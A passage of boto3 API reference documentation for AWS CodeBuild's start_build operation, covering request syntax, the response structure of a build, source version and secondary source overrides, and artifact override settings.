'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
],
'secondarySourceVersions': [
{
'sourceIdentifier': 'string',
'sourceVersion': 'string'
},
],
'artifacts': {
'location': 'string',
'sha256sum': 'string',
'md5sum': 'string',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
'secondaryArtifacts': [
{
'location': 'string',
'sha256sum': 'string',
'md5sum': 'string',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
],
'cache': {
'type': 'NO_CACHE'|'S3'|'LOCAL',
'location': 'string',
'modes': [
'LOCAL_DOCKER_LAYER_CACHE'|'LOCAL_SOURCE_CACHE'|'LOCAL_CUSTOM_CACHE',
]
},
'environment': {
'type': 'WINDOWS_CONTAINER'|'LINUX_CONTAINER',
'image': 'string',
'computeType': 'BUILD_GENERAL1_SMALL'|'BUILD_GENERAL1_MEDIUM'|'BUILD_GENERAL1_LARGE',
'environmentVariables': [
{
'name': 'string',
'value': 'string',
'type': 'PLAINTEXT'|'PARAMETER_STORE'
},
],
'privilegedMode': True|False,
'certificate': 'string',
'registryCredential': {
'credential': 'string',
'credentialProvider': 'SECRETS_MANAGER'
},
'imagePullCredentialsType': 'CODEBUILD'|'SERVICE_ROLE'
},
'serviceRole': 'string',
'logs': {
'groupName': 'string',
'streamName': 'string',
'deepLink': 'string',
's3DeepLink': 'string',
'cloudWatchLogs': {
'status': 'ENABLED'|'DISABLED',
'groupName': 'string',
'streamName': 'string'
},
's3Logs': {
'status': 'ENABLED'|'DISABLED',
'location': 'string',
'encryptionDisabled': True|False
}
},
'timeoutInMinutes': 123,
'queuedTimeoutInMinutes': 123,
'buildComplete': True|False,
'initiator': 'string',
'vpcConfig': {
'vpcId': 'string',
'subnets': [
'string',
],
'securityGroupIds': [
'string',
]
},
'networkInterface': {
'subnetId': 'string',
'networkInterfaceId': 'string'
},
'encryptionKey': 'string'
}
}
**Response Structure**
- *(dict) --*
- **build** *(dict) --*
Information about the build to be run.
- **id** *(string) --*
The unique ID for the build.
- **arn** *(string) --*
The Amazon Resource Name (ARN) of the build.
- **startTime** *(datetime) --*
When the build process started, expressed in Unix time format.
- **endTime** *(datetime) --*
When the build process ended, expressed in Unix time format.
- **currentPhase** *(string) --*
The current build phase.
- **buildStatus** *(string) --*
The current status of the build. Valid values include:
* ``FAILED`` : The build failed.
* ``FAULT`` : The build faulted.
* ``IN_PROGRESS`` : The build is still in progress.
* ``STOPPED`` : The build stopped.
* ``SUCCEEDED`` : The build succeeded.
* ``TIMED_OUT`` : The build timed out.
- **sourceVersion** *(string) --*
Any version identifier for the version of the source code to be built.
- **resolvedSourceVersion** *(string) --*
An identifier for the version of this build's source code.
* For AWS CodeCommit, GitHub, GitHub Enterprise, and Bitbucket, the commit ID.
* For AWS CodePipeline, the source revision provided by AWS CodePipeline.
* For Amazon Simple Storage Service (Amazon S3), this does not apply.
- **projectName** *(string) --*
The name of the AWS CodeBuild project.
- **phases** *(list) --*
Information about all previous build phases that are complete and information about any current build phase that is not yet complete.
- *(dict) --*
Information about a stage for a build.
- **phaseType** *(string) --*
The name of the build phase. Valid values include:
* ``BUILD`` : Core build activities typically occur in this build phase.
* ``COMPLETED`` : The build has been completed.
* ``DOWNLOAD_SOURCE`` : Source code is being downloaded in this build phase.
* ``FINALIZING`` : The build process is completing in this build phase.
* ``INSTALL`` : Installation activities typically occur in this build phase.
* ``POST_BUILD`` : Post-build activities typically occur in this build phase.
* ``PRE_BUILD`` : Pre-build activities typically occur in this build phase.
* ``PROVISIONING`` : The build environment is being set up.
* ``QUEUED`` : The build has been submitted and is queued behind other submitted builds.
* ``SUBMITTED`` : The build has been submitted.
* ``UPLOAD_ARTIFACTS`` : Build output artifacts are being uploaded to the output location.
- **phaseStatus** *(string) --*
The current status of the build phase. Valid values include:
* ``FAILED`` : The build phase failed.
* ``FAULT`` : The build phase faulted.
* ``IN_PROGRESS`` : The build phase is still in progress.
* ``QUEUED`` : The build has been submitted and is queued behind other submitted builds.
* ``STOPPED`` : The build phase stopped.
* ``SUCCEEDED`` : The build phase succeeded.
* ``TIMED_OUT`` : The build phase timed out.
- **startTime** *(datetime) --*
When the build phase started, expressed in Unix time format.
- **endTime** *(datetime) --*
When the build phase ended, expressed in Unix time format.
- **durationInSeconds** *(integer) --*
The duration, in seconds, between the starting and ending times of the build's phase.
- **contexts** *(list) --*
Additional information about a build phase, especially to help troubleshoot a failed build.
- *(dict) --*
Additional information about a build phase that has an error. You can use this information for troubleshooting.
- **statusCode** *(string) --*
The status code for the context of the build phase.
- **message** *(string) --*
An explanation of the build phase's context. This might include a command ID and an exit code.
- **source** *(dict) --*
Information about the source code to be built.
- **type** *(string) --*
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline's source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --*
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console's use only. Your code should not get or set this information directly.
- **type** *(string) --*
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build's start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
- **secondarySources** *(list) --*
An array of ``ProjectSource`` objects.
- *(dict) --*
Information about the build input source code for the build project.
- **type** *(string) --*
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline's source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --*
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console's use only. Your code should not get or set this information directly.
- **type** *(string) --*
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build's start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
- **secondarySourceVersions** *(list) --*
An array of ``ProjectSourceVersion`` objects. Each ``ProjectSourceVersion`` must be one of:
* For AWS CodeCommit: the commit ID to use.
* For GitHub: the commit ID, pull request ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a pull request ID is specified, it must use the format ``pr/pull-request-ID`` (for example, ``pr/25`` ). If a branch name is specified, the branch's HEAD commit ID is used. If not specified, the default branch's HEAD commit ID is used.
* For Bitbucket: the commit ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a branch name is specified, the branch's HEAD commit ID is used. If not specified, the default branch's HEAD commit ID is used.
* For Amazon Simple Storage Service (Amazon S3): the version ID of the object that represents the build input ZIP file to use.
- *(dict) --*
A source identifier and its corresponding version.
- **sourceIdentifier** *(string) --*
An identifier for a source in the build project.
- **sourceVersion** *(string) --*
The source version for the corresponding source identifier. If specified, must be one of:
* For AWS CodeCommit: the commit ID to use.
* For GitHub: the commit ID, pull request ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a pull request ID is specified, it must use the format ``pr/pull-request-ID`` (for example, ``pr/25`` ). If a branch name is specified, the branch's HEAD commit ID is used. If not specified, the default branch's HEAD commit ID is used.
* For Bitbucket: the commit ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a branch name is specified, the branch's HEAD commit ID is used. If not specified, the default branch's HEAD commit ID is used.
* For Amazon Simple Storage Service (Amazon S3): the version ID of the object that represents the build input ZIP file to use.
- **artifacts** *(dict) --*
Information about the output artifacts for the build.
- **location** *(string) --*
Information about the location of the build artifacts.
- **sha256sum** *(string) --*
The SHA-256 hash of the build artifact.
You can use this hash along with a checksum tool to confirm file integrity and authenticity.
.. note::
This value is available only if the build project's ``packaging`` value is set to ``ZIP`` .
- **md5sum** *(string) --*
The MD5 hash of the build artifact.
You can use this hash along with a checksum tool to confirm file integrity and authenticity.
.. note::
This value is available only if the build project's ``packaging`` value is set to ``ZIP`` .
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Information that tells you if encryption for build artifacts is disabled.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
- **secondaryArtifacts** *(list) --*
An array of ``ProjectArtifacts`` objects.
- *(dict) --*
Information about build output artifacts.
- **location** *(string) --*
Information about the location of the build artifacts.
- **sha256sum** *(string) --*
The SHA-256 hash of the build artifact.
You can use this hash along with a checksum tool to confirm file integrity and authenticity.
.. note::
This value is available only if the build project's ``packaging`` value is set to ``ZIP`` .
- **md5sum** *(string) --*
The MD5 hash of the build artifact.
You can use this hash along with a checksum tool to confirm file integrity and authenticity.
.. note::
This value is available only if the build project's ``packaging`` value is set to ``ZIP`` .
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Information that tells you if encryption for build artifacts is disabled.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
- **cache** *(dict) --*
Information about the cache for the build.
- **type** *(string) --*
The type of cache used by the build project. Valid values include:
* ``NO_CACHE`` : The build project does not use any cache.
* ``S3`` : The build project reads and writes from and to S3.
* ``LOCAL`` : The build project stores a cache locally on a build host that is only available to that build host.
- **location** *(string) --*
Information about the cache location:
* ``NO_CACHE`` or ``LOCAL`` : This value is ignored.
* ``S3`` : This is the S3 bucket name/prefix.
- **modes** *(list) --*
If you use a ``LOCAL`` cache, the local cache mode. You can use one or more local cache modes at the same time.
* ``LOCAL_SOURCE_CACHE`` mode caches Git metadata for primary and secondary sources. After the cache is created, subsequent builds pull only the change between commits. This mode is a good choice for projects with a clean working directory and a source that is a large Git repository. If you choose this option and your project does not use a Git repository (GitHub, GitHub Enterprise, or Bitbucket), the option is ignored.
* ``LOCAL_DOCKER_LAYER_CACHE`` mode caches existing Docker layers. This mode is a good choice for projects that build or pull large Docker images. It can prevent the performance issues caused by pulling large Docker images down from the network.
.. note::
* You can use a Docker layer cache in the Linux environment only.
* The ``privileged`` flag must be set so that your project has the required Docker permissions.
* You should consider the security implications before you use a Docker layer cache.
* ``LOCAL_CUSTOM_CACHE`` mode caches directories you specify in the buildspec file. This mode is a good choice if your build scenario is not suited to one of the other two local cache modes. If you use a custom cache:
* Only directories can be specified for caching. You cannot specify individual files.
* Symlinks are used to reference cached directories.
* Cached directories are linked to your build before it downloads its project sources. Cached items are overridden if a source item has the same name. Directories are specified using cache paths in the buildspec file.
- *(string) --*
- **environment** *(dict) --*
Information about the build environment for this build.
- **type** *(string) --*
The type of build environment to use for related builds.
- **image** *(string) --*
The image tag or image digest that identifies the Docker image to use for this build project. Use the following formats:
* For an image tag: ``registry/repository:tag`` . For example, to specify an image with the tag "latest," use ``registry/repository:latest`` .
* For an image digest: ``registry/repository@digest`` . For example, to specify an image with the digest "sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf," use ``registry/repository@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf`` .
- **computeType** *(string) --*
Information about the compute resources the build project uses. Available values include:
* ``BUILD_GENERAL1_SMALL`` : Use up to 3 GB memory and 2 vCPUs for builds.
* ``BUILD_GENERAL1_MEDIUM`` : Use up to 7 GB memory and 4 vCPUs for builds.
* ``BUILD_GENERAL1_LARGE`` : Use up to 15 GB memory and 8 vCPUs for builds.
- **environmentVariables** *(list) --*
A set of environment variables to make available to builds for this build project.
- *(dict) --*
Information about an environment variable for a build project or a build.
- **name** *(string) --*
The name or key of the environment variable.
- **value** *(string) --*
The value of the environment variable.
.. warning::
We strongly discourage the use of environment variables to store sensitive values, especially AWS access key IDs and secret access keys. Environment variables can be displayed in plain text using the AWS CodeBuild console and the AWS Command Line Interface (AWS CLI).
- **type** *(string) --*
The type of environment variable. Valid values include:
* ``PARAMETER_STORE`` : An environment variable stored in Amazon EC2 Systems Manager Parameter Store.
* ``PLAINTEXT`` : An environment variable in plaintext format.
- **privilegedMode** *(boolean) --*
Enables running the Docker daemon inside a Docker container. Set to true only if the build project is used to build Docker images, and the specified build environment image is not provided by AWS CodeBuild with Docker support. Otherwise, all associated builds that attempt to interact with the Docker daemon fail. You must also start the Docker daemon so that builds can interact with it. One way to do this is to initialize the Docker daemon during the install phase of your build spec by running the following build commands. (Do not run these commands if the specified build environment image is provided by AWS CodeBuild with Docker support.)
If the operating system's base image is Ubuntu Linux:
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout 15 sh -c "until docker info; do echo .; sleep 1; done"``
If the operating system's base image is Alpine Linux, add the ``-t`` argument to ``timeout`` :
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout -t 15 sh -c "until docker info; do echo .; sleep 1; done"``
- **certificate** *(string) --*
The certificate to use with this build project.
- **registryCredential** *(dict) --*
The credentials for access to a private registry.
- **credential** *(string) --*
The Amazon Resource Name (ARN) or name of credentials created using AWS Secrets Manager.
.. note::
The ``credential`` can use the name of the credentials only if they exist in your current region.
- **credentialProvider** *(string) --*
The service that created the credentials to access a private Docker registry. The valid value, SECRETS_MANAGER, is for AWS Secrets Manager.
- **imagePullCredentialsType** *(string) --*
The type of credentials AWS CodeBuild uses to pull images in your build. There are two valid values:
* ``CODEBUILD`` specifies that AWS CodeBuild uses its own credentials. This requires that you modify your ECR repository policy to trust AWS CodeBuild's service principal.
* ``SERVICE_ROLE`` specifies that AWS CodeBuild uses your build project's service role.
When you use a cross-account or private registry image, you must use SERVICE_ROLE credentials. When you use an AWS CodeBuild curated image, you must use CODEBUILD credentials.
- **serviceRole** *(string) --*
The name of a service role used for this build.
- **logs** *(dict) --*
Information about the build's logs in Amazon CloudWatch Logs.
- **groupName** *(string) --*
The name of the Amazon CloudWatch Logs group for the build logs.
- **streamName** *(string) --*
The name of the Amazon CloudWatch Logs stream for the build logs.
- **deepLink** *(string) --*
The URL to an individual build log in Amazon CloudWatch Logs.
- **s3DeepLink** *(string) --*
The URL to a build log in an S3 bucket.
- **cloudWatchLogs** *(dict) --*
Information about Amazon CloudWatch Logs for a build project.
- **status** *(string) --*
The current status of the logs in Amazon CloudWatch Logs for a build project. Valid values are:
* ``ENABLED`` : Amazon CloudWatch Logs are enabled for this build project.
* ``DISABLED`` : Amazon CloudWatch Logs are not enabled for this build project.
- **groupName** *(string) --*
The group name of the logs in Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **streamName** *(string) --*
The prefix of the stream name of the Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **s3Logs** *(dict) --*
Information about S3 logs for a build project.
- **status** *(string) --*
The current status of the S3 build logs. Valid values are:
* ``ENABLED`` : S3 build logs are enabled for this build project.
* ``DISABLED`` : S3 build logs are not enabled for this build project.
- **location** *(string) --*
The ARN of an S3 bucket and the path prefix for S3 logs. If your Amazon S3 bucket name is ``my-bucket`` , and your path prefix is ``build-log`` , then acceptable formats are ``my-bucket/build-log`` or ``arn:aws:s3:::my-bucket/build-log`` .
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your S3 build log output encrypted. By default S3 build logs are encrypted.
- **timeoutInMinutes** *(integer) --*
How long, in minutes, AWS CodeBuild waits before timing out this build if it is not marked as completed.
- **queuedTimeoutInMinutes** *(integer) --*
The number of minutes a build is allowed to be queued before it times out.
- **buildComplete** *(boolean) --*
Whether the build is complete. True if complete; otherwise, false.
- **initiator** *(string) --*
The entity that started the build. Valid values include:
* If AWS CodePipeline started the build, the pipeline's name (for example, ``codepipeline/my-demo-pipeline`` ).
* If an AWS Identity and Access Management (IAM) user started the build, the user's name (for example, ``MyUserName`` ).
* If the Jenkins plugin for AWS CodeBuild started the build, the string ``CodeBuild-Jenkins-Plugin`` .
- **vpcConfig** *(dict) --*
If your AWS CodeBuild project accesses resources in an Amazon VPC, you provide this parameter that identifies the VPC ID and the list of security group IDs and subnet IDs. The security groups and subnets must belong to the same VPC. You must provide at least one security group and one subnet ID.
- **vpcId** *(string) --*
The ID of the Amazon VPC.
- **subnets** *(list) --*
A list of one or more subnet IDs in your Amazon VPC.
- *(string) --*
- **securityGroupIds** *(list) --*
A list of one or more security groups IDs in your Amazon VPC.
- *(string) --*
- **networkInterface** *(dict) --*
Describes a network interface.
- **subnetId** *(string) --*
The ID of the subnet.
- **networkInterfaceId** *(string) --*
The ID of the network interface.
- **encryptionKey** *(string) --*
The AWS Key Management Service (AWS KMS) customer master key (CMK) to be used for encrypting the build output artifacts.
.. note::
You can use a cross-account KMS key to encrypt the build output artifacts if your service role has permission to that key.
You can specify either the Amazon Resource Name (ARN) of the CMK or, if available, the CMK's alias (using the format ``alias/*alias-name* `` ).
:type projectName: string
:param projectName: **[REQUIRED]**
The name of the AWS CodeBuild build project to start running a build.
:type secondarySourcesOverride: list
:param secondarySourcesOverride:
An array of ``ProjectSource`` objects.
- *(dict) --*
Information about the build input source code for the build project.
- **type** *(string) --* **[REQUIRED]**
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline\'s source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object\'s ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object\'s ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --* **[REQUIRED]**
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console\'s use only. Your code should not get or set this information directly.
- **type** *(string) --* **[REQUIRED]**
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build\'s start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
:type secondarySourcesVersionOverride: list
:param secondarySourcesVersionOverride:
An array of ``ProjectSourceVersion`` objects that specify one or more versions of the project\'s secondary sources to be used for this build only.
- *(dict) --*
A source identifier and its corresponding version.
- **sourceIdentifier** *(string) --* **[REQUIRED]**
An identifier for a source in the build project.
- **sourceVersion** *(string) --* **[REQUIRED]**
The source version for the corresponding source identifier. If specified, must be one of:
* For AWS CodeCommit: the commit ID to use.
* For GitHub: the commit ID, pull request ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a pull request ID is specified, it must use the format ``pr/pull-request-ID`` (for example, ``pr/25`` ). If a branch name is specified, the branch\'s HEAD commit ID is used. If not specified, the default branch\'s HEAD commit ID is used.
* For Bitbucket: the commit ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a branch name is specified, the branch\'s HEAD commit ID is used. If not specified, the default branch\'s HEAD commit ID is used.
* For Amazon Simple Storage Service (Amazon S3): the version ID of the object that represents the build input ZIP file to use.
:type sourceVersion: string
:param sourceVersion:
A version of the build input to be built, for this build only. If not specified, the latest version is used. If specified, must be one of:
* For AWS CodeCommit: the commit ID to use.
* For GitHub: the commit ID, pull request ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a pull request ID is specified, it must use the format ``pr/pull-request-ID`` (for example ``pr/25`` ). If a branch name is specified, the branch\'s HEAD commit ID is used. If not specified, the default branch\'s HEAD commit ID is used.
* For Bitbucket: the commit ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a branch name is specified, the branch\'s HEAD commit ID is used. If not specified, the default branch\'s HEAD commit ID is used.
* For Amazon Simple Storage Service (Amazon S3): the version ID of the object that represents the build input ZIP file to use.
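For example, a minimal sketch (with a placeholder project name) that builds a specific GitHub pull request for this build only:
::
import boto3

client = boto3.client('codebuild')

# Build pull request 25 instead of the default branch's HEAD commit.
response = client.start_build(
    projectName='my-github-project',  # placeholder name
    sourceVersion='pr/25'
)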
:type artifactsOverride: dict
:param artifactsOverride:
Build output artifact settings that override, for this build only, the latest ones already defined in the build project.
- **type** *(string) --* **[REQUIRED]**
The type of build output artifact. Valid values include:
* ``CODEPIPELINE`` : The build project has build output generated through AWS CodePipeline.
* ``NO_ARTIFACTS`` : The build project does not produce any build output.
* ``S3`` : The build project stores build output in Amazon Simple Storage Service (Amazon S3).
- **location** *(string) --*
Information about the build output artifact location:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output locations instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output bucket.
- **path** *(string) --*
Along with ``namespaceType`` and ``name`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the path to the output artifact. If ``path`` is not specified, ``path`` is not used.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``NONE`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in the output bucket at ``MyArtifacts/MyArtifact.zip`` .
- **namespaceType** *(string) --*
Along with ``path`` and ``name`` , the pattern that AWS CodeBuild uses to determine the name and location to store the output artifact:
